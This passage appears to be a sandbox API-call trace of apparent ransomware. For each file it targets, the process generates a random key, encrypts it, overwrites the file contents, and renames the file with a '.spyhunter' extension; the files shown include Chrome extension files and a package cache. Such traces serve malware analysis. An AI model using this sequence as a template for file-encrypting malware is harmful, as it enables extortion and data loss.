dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0136.757] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.757] GetProcessHeap () returned 0x2c0000 [0136.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.757] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f4a4*=0xfe, lpOverlapped=0x0) returned 1 [0136.758] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.759] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x57f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f4a4*=0xfe, lpOverlapped=0x0) returned 1 [0136.759] GetProcessHeap () returned 0x2c0000 [0136.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.759] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.759] WriteFile (in: hFile=0x178, lpBuffer=0x57f4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4a4, lpOverlapped=0x0 | out: lpBuffer=0x57f4e4*, lpNumberOfBytesWritten=0x57f4a4*=0x4, lpOverlapped=0x0) returned 1 [0136.759] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4a4*=0x30, lpOverlapped=0x0) returned 1 [0136.759] CloseHandle (hObject=0x178) returned 1 [0136.759] GetProcessHeap () returned 0x2c0000 [0136.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0136.759] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.spyhunter") returned 165 [0136.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0136.760] GetProcessHeap () returned 0x2c0000 [0136.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0136.760] GetProcessHeap () returned 0x2c0000 [0136.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.760] GetProcessHeap () returned 0x2c0000 [0136.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0136.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4d8 | out: pbBuffer=0x57f4d8) returned 1 [0136.798] GetProcessHeap () returned 0x2c0000 [0136.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.799] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4d0*=0x30) returned 1 [0136.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js") returned 150 [0136.802] StrStrW (lpFirst="page_embed_script.js", lpSrch=".txt") returned 0x0 [0136.802] GetProcessHeap () returned 0x2c0000 [0136.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.802] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f494*=0xe0, lpOverlapped=0x0) returned 1 [0136.803] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.803] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x57f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f494*=0xe0, lpOverlapped=0x0) returned 1 [0136.803] GetProcessHeap () returned 0x2c0000 [0136.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.803] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.810] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f494, lpOverlapped=0x0 | out: lpBuffer=0x57f4d4*, lpNumberOfBytesWritten=0x57f494*=0x4, lpOverlapped=0x0) returned 1 [0136.811] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f494, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f494*=0x30, lpOverlapped=0x0) returned 1 [0136.811] CloseHandle (hObject=0x18c) returned 1 [0136.811] GetProcessHeap () returned 0x2c0000 [0136.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.811] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.spyhunter") returned 160 [0136.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.spyhunter")) returned 1 [0136.812] GetProcessHeap () returned 0x2c0000 [0136.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.812] GetProcessHeap () returned 0x2c0000 [0136.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.812] GetProcessHeap () returned 0x2c0000 [0136.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff58f0 | out: hHeap=0x2c0000) returned 1 [0136.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4d0 | out: pbBuffer=0x57f4d0) returned 1 [0136.812] GetProcessHeap () returned 0x2c0000 [0136.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4c8*=0x30) returned 1 [0136.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0136.813] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".txt") returned 0x0 [0136.813] GetProcessHeap () returned 0x2c0000 [0136.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.813] ReadFile (in: hFile=0x18c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f48c*=0x356, lpOverlapped=0x0) returned 1 [0136.912] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.912] WriteFile (in: hFile=0x18c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f48c*=0x356, lpOverlapped=0x0) returned 1 [0136.912] GetProcessHeap () returned 0x2c0000 [0136.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.912] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.912] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x57f4cc*, lpNumberOfBytesWritten=0x57f48c*=0x4, lpOverlapped=0x0) returned 1 [0136.912] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f48c*=0x30, lpOverlapped=0x0) returned 1 [0136.912] CloseHandle (hObject=0x18c) returned 1 [0136.912] GetProcessHeap () returned 0x2c0000 [0136.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.913] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.spyhunter") returned 164 [0136.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.spyhunter")) returned 1 [0136.913] GetProcessHeap () returned 0x2c0000 [0136.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.913] GetProcessHeap () returned 0x2c0000 [0136.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.914] GetProcessHeap () returned 0x2c0000 [0136.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6de90 | out: hHeap=0x2c0000) returned 1 [0136.914] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4d0 | out: pbBuffer=0x57f4d0) returned 1 [0136.914] GetProcessHeap () returned 0x2c0000 [0136.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.914] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4c8*=0x30) returned 1 [0136.914] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.914] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0136.914] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0136.914] GetProcessHeap () returned 0x2c0000 [0136.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.915] ReadFile (in: hFile=0x18c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f48c*=0x2800, lpOverlapped=0x0) returned 1 [0137.235] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.235] WriteFile (in: hFile=0x18c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f48c*=0x2800, lpOverlapped=0x0) returned 1 [0137.235] GetProcessHeap () returned 0x2c0000 [0137.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0137.236] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.236] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x57f4cc*, lpNumberOfBytesWritten=0x57f48c*=0x4, lpOverlapped=0x0) returned 1 [0137.237] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f48c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f48c*=0x30, lpOverlapped=0x0) returned 1 [0137.237] CloseHandle (hObject=0x18c) returned 1 [0137.237] GetProcessHeap () returned 0x2c0000 [0137.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.237] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.spyhunter") returned 134 [0137.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.spyhunter")) returned 1 [0137.238] GetProcessHeap () returned 0x2c0000 [0137.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.238] GetProcessHeap () returned 0x2c0000 [0137.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.238] GetProcessHeap () returned 0x2c0000 [0137.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c778 | out: hHeap=0x2c0000) returned 1 [0137.238] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4c8 | out: pbBuffer=0x57f4c8) returned 1 [0137.238] GetProcessHeap () returned 0x2c0000 [0137.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4c0*=0x30) returned 1 [0137.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0137.239] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.239] GetProcessHeap () returned 0x2c0000 [0137.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.239] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f484*=0xb2, lpOverlapped=0x0) returned 1 [0137.240] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.240] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x57f484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f484*=0xb2, lpOverlapped=0x0) returned 1 [0137.240] GetProcessHeap () returned 0x2c0000 [0137.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.240] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.241] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f484, lpOverlapped=0x0 | out: lpBuffer=0x57f4c4*, lpNumberOfBytesWritten=0x57f484*=0x4, lpOverlapped=0x0) returned 1 [0137.241] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f484, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f484*=0x30, lpOverlapped=0x0) returned 1 [0137.241] CloseHandle (hObject=0x18c) returned 1 [0137.241] GetProcessHeap () returned 0x2c0000 [0137.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.241] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.spyhunter") returned 165 [0137.241] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.spyhunter")) returned 1 [0137.242] GetProcessHeap () returned 0x2c0000 [0137.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.242] GetProcessHeap () returned 0x2c0000 [0137.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.242] GetProcessHeap () returned 0x2c0000 [0137.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8730 | out: hHeap=0x2c0000) returned 1 [0137.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4c0 | out: pbBuffer=0x57f4c0) returned 1 [0137.243] GetProcessHeap () returned 0x2c0000 [0137.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4b8*=0x30) returned 1 [0137.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.244] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0137.244] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.244] GetProcessHeap () returned 0x2c0000 [0137.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.244] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f47c*=0xbb, lpOverlapped=0x0) returned 1 [0137.245] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.245] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x57f47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f47c*=0xbb, lpOverlapped=0x0) returned 1 [0137.245] GetProcessHeap () returned 0x2c0000 [0137.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.245] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.245] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f47c, lpOverlapped=0x0 | 